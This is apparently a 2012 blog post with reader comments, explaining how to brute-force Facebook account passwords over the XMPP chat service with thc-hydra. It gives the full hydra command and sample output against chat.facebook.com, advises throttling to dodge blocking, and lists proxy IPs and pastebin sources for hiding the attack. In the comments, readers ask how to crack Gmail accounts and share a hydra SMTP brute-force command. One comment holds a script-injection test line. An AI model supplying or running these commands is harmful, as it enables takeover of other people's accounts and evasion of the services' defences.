Just a short reminder, that you can easily brute force Facebook Accounts using the chat interface (XMPP) and thc-hydra (a very fast brute force tool, supports wordlists, too).
Since version 7.x XMPP support has been added, so be sure to have the latest version. (It compiles for XMPP out of the box, so even if you don’t have all the libraries for SSH/MySQL/… it might work.)
Here is an example of the command line:
hydra -C /tmp/username_pw_combo_list.txt -s 5222 -f -V -S chat.facebook.com xmpp
Thats it, but beware to throttle your attacks. After some wrong logins Facebook will block you from using XMPP. It will look like this in hydra:
Hydra v7.3 (c)2012 by van Hauser/THC & David Maciejak – for legal purposes only
Hydra (http://www.thc.org/thc-hydra) starting at 2012-07-xx xx:xx:xx
[DATA] 1 task, 1 server, 994 login tries, ~994 tries per task
[DATA] attacking service xmpp on port 5222
[ATTEMPT] target chat.facebook.com – login “a@b.com” – pass “xxx” – 1 of 994 [child 0]
[RE-ATTEMPT] target chat.facebook.com – login “a@b.com” – pass “xxx” – 1 of 994 [child 0]
[RE-ATTEMPT] target chat.facebook.com – login “a@b.com” – pass “xxx” – 1 of 994 [child 0]
[ERROR] Too many connect errors to target, disabling xmpp://chat.facebook.com:5222
0 of 1 target successfuly completed, 0 valid passwords found
[ERROR] 1 target did not resolve or could not be connected
Hydra (http://www.thc.org/thc-hydra) finished at 2012-07-xx xx:xx:xx
This guy tweets a list of proxies if you need some ;)
https://twitter.com/crazyjunkie1
http://pastebin.com/u/gelbeseiten
Examples: http://pastebin.com/raw.php?i=EXUYq9Hh, http://pastebin.com/raw.php?i=BjbqBxJT, http://pastebin.com/raw.php?i=tkT45MBE
106.120.112.216:808
109.196.210.110:8080
109.73.68.233:7808
109.73.68.233:8089
110.154.195.218:18186
110.156.140.29:18186
110.189.209.165:18186
110.247.88.5:18186
110.76.38.246:80
110.77.233.59:3128
111.1.32.124:81
111.1.32.124:82
111.1.32.124:83
111.1.32.124:84
111.1.36.26:80
111.1.36.27:80
111.1.36.27:81
111.1.36.27:82
111.1.36.27:83
111.1.36.27:84
111.1.36.27:85
111.103.154.92:8888
[..]
Can you please share the actual command syntax for facebook account.
For example I am running hydra -S -l xxxxx@gmail.com -x 6:8:al -w 32 -e ns -V -s 465 smtp-gmail.com smtp for gmail account.
Are you sure about the port? For me 465 is not open. Also I never tried it for gmail…
PORT STATE SERVICE VERSION
25/tcp open smtp
465/tcp filtered smtps
filtered == open
please what is the actual command for the gmail cracking with wordlist
ok if im looking to use a wordlist for a username i already know what would that look like
can u tell the full method will correct codes because password is not showing it is coming in question marks
interesting idea to avoid the security associated with the web login panel. Great!
alert(“Hello”);
what’s in here man passwords and username or just username /tmp/username_pw_combo_list.txt
its a riddle for the patient reader